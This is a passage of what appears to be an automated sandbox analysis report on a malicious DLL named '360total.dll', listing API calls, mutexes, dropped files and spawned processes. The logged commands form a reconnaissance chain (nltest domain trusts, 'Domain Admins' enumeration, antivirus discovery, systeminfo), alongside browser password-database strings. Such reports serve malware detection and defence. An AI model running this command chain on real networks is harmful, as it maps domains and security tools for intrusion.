                      Source: C:\Windows\System32\rundll32.exe Process Stats: CPU usage > 49%
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CB0C4 NtOpenKey,RtlpNtOpenKey,4_2_00000237C16CB0C4
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C78C0 NtReadFile,4_2_00000237C16C78C0
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7B40 NtFreeVirtualMemory,4_2_00000237C16C7B40
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CAD34 NtAllocateVirtualMemory,4_2_00000237C16CAD34
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CB1D4 NtQueryValueKey,NtQueryValueKey,NtClose,4_2_00000237C16CB1D4
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C79C8 NtClose,4_2_00000237C16C79C8
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C77B0 RtlInitUnicodeString,NtCreateFile,4_2_00000237C16C77B0
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C378C NtClose,4_2_00000237C16C378C
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7588 RtlInitUnicodeString,NtCreateFile,NtClose,4_2_00000237C16C7588
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,4_2_00000237C16C463C
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7A54 NtWriteFile,4_2_00000237C16C7A54
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16D0AC0 NtFreeVirtualMemory,4_2_00000237C16D0AC0
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7ACC NtClose,4_2_00000237C16C7ACC
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16D0A78 NtClose,4_2_00000237C16D0A78
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7694 RtlInitUnicodeString,NtDeleteFile,4_2_00000237C16C7694
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16D0A90 NtDeleteFile,4_2_00000237C16D0A90
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C745C RtlInitUnicodeString,NtOpenFile,NtClose,4_2_00000237C16C745C
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CCB54 NtDelayExecution,4_2_00000237C16CCB54
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C7704 NtQueryInformationFile,4_2_00000237C16C7704
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16D0AF0 NtWriteFile,4_2_00000237C16D0AF0
                      Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E248C NtFreeVirtualMemory,8_3_000001E3B57E248C
                      Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E241C NtAllocateVirtualMemory,8_3_000001E3B57E241C
                      Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006A2C8: DeviceIoControl,3_2_000000018006A2C8
                      Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,3_2_000000018004B1A4
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58797088_3_000001E3B5879708
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E453C8_3_000001E3B57E453C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5862B388_3_000001E3B5862B38
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B586DB348_3_000001E3B586DB34
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5850B548_3_000001E3B5850B54
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B582EA848_3_000001E3B582EA84
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5810A8A8_3_000001E3B5810A8A
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57ED9E48_3_000001E3B57ED9E4
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5810D188_3_000001E3B5810D18
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E9CBC8_3_000001E3B57E9CBC
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5855D688_3_000001E3B5855D68
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5847C148_3_000001E3B5847C14
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B580FC728_3_000001E3B580FC72
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B582BB948_3_000001E3B582BB94
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B587EBB88_3_000001E3B587EBB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B585672C8_3_000001E3B585672C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58057688_3_000001E3B5805768
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B586D63C8_3_000001E3B586D63C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58096508_3_000001E3B5809650
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58105A08_3_000001E3B58105A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B582B5D08_3_000001E3B582B5D0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B580F5FB8_3_000001E3B580F5FB
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58405FC8_3_000001E3B58405FC
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58749408_3_000001E3B5874940
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58589808_3_000001E3B5858980
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58598B08_3_000001E3B58598B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B586D8B88_3_000001E3B586D8B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58188248_3_000001E3B5818824
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57F77E08_3_000001E3B57F77E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B581D8348_3_000001E3B581D834
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58478748_3_000001E3B5847874
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B586B3708_3_000001E3B586B370
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E63588_3_000001E3B57E6358
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57EE31C8_3_000001E3B57EE31C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B583318C8_3_000001E3B583318C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57FD19C8_3_000001E3B57FD19C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58151C08_3_000001E3B58151C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58411CC8_3_000001E3B58411CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58251F88_3_000001E3B58251F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58101FB8_3_000001E3B58101FB
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58555348_3_000001E3B5855534
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58005408_3_000001E3B5800540
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58434988_3_000001E3B5843498
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E85688_3_000001E3B57E8568
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B582F4C48_3_000001E3B582F4C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58484D88_3_000001E3B58484D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58694F08_3_000001E3B58694F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58524308_3_000001E3B5852430
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58374488_3_000001E3B5837448
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B583E45C8_3_000001E3B583E45C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58573A08_3_000001E3B58573A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58283EC8_3_000001E3B58283EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B585AF208_3_000001E3B585AF20
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57EBEB88_3_000001E3B57EBEB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5829F688_3_000001E3B5829F68
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B587AE848_3_000001E3B587AE84
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5870EC08_3_000001E3B5870EC0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5841ECC8_3_000001E3B5841ECC
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5837EE88_3_000001E3B5837EE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57FFE388_3_000001E3B57FFE38
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5809D948_3_000001E3B5809D94
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5879D948_3_000001E3B5879D94
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5838DF88_3_000001E3B5838DF8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58401148_3_000001E3B5840114
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58541348_3_000001E3B5854134
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58501548_3_000001E3B5850154
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58270C08_3_000001E3B58270C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B583F0188_3_000001E3B583F018
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E7FD08_3_000001E3B57E7FD0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58060388_3_000001E3B5806038
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B584A0488_3_000001E3B584A048
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B581E0748_3_000001E3B581E074
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E60788_3_000001E3B57E6078
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll 4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
                      Source: C:\Windows\System32\rundll32.exeCode function: String function: 000000018000CF30 appears 33 times
                      Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000000180005348 appears 71 times
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6200 -s 456
                      Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winDLL@90/16@10/7
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess,3_2_0000000180049050
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,3_2_000000018004B1A4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,3_2_0000000180049278
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,3_2_000000018008395A
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004B780 CreateToolhelp32Snapshot,memset,Process32FirstW,_wcsicmp,ProcessIdToSessionId,Process32NextW,CloseHandle,CloseHandle,3_2_000000018004B780
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800072A8 CoCreateInstance,3_2_00000001800072A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018003A8D4 LoadLibraryExW,FindResourceW,SizeofResource,LoadResource,LockResource,malloc,memmove,FreeResource,FreeLibrary,VerQueryValueW,free,3_2_000000018003A8D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,3_2_0000000180049AEC
                      Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Roaming\Custom_update
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6200
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2780:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_03
                      Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\runnung
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3772:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1680:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
                      Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\Uhad32.tmp
                      Source: 360total.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
                      Source: rundll32.exe, rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, Update_27361bf8.dll.4.drBinary or memory string: select * from sqlite_sequence;
                      Source: rundll32.exe, 00000008.00000003.3366590989.000001E3B5885000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: rundll32.exe, rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, Update_27361bf8.dll.4.drBinary or memory string: update sqlite_sequence set seq = 0 where name='MT';
                      Source: rundll32.exe, 00000008.00000003.3366590989.000001E3B5885000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: rundll32.exe, 00000008.00000003.3370598400.000001E3B564C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3368999510.000001E3B5636000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3368999510.000001E3B5648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: 360total.dll.dllReversingLabs: Detection: 18%
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\360total.dll.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll", #1
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6200 -s 456
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq
                      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1996,i,16797134848863919888,4031310649045437557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c ipconfig /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c systeminfo
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net config workstation
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c whoami /groups
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\loaddll64.exe Section loaded: apphelp.dll
                      Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll
                      Source: C:\Windows\System32\ipconfig.exe Section loaded: winnsi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll
                      Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll
                      Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll
                      Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll
                      Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
                      Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
                      Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
                      Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
                      Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
                      Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\net.exe Section loaded: browcli.dll
                      Source: C:\Windows\System32\net.exe Section loaded: cscapi.dll
                      Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
                      Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
                      Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
                      Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
                      Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
                      Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
                      Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
                      Source: C:\Windows\System32\net1.exe Section loaded: cscapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
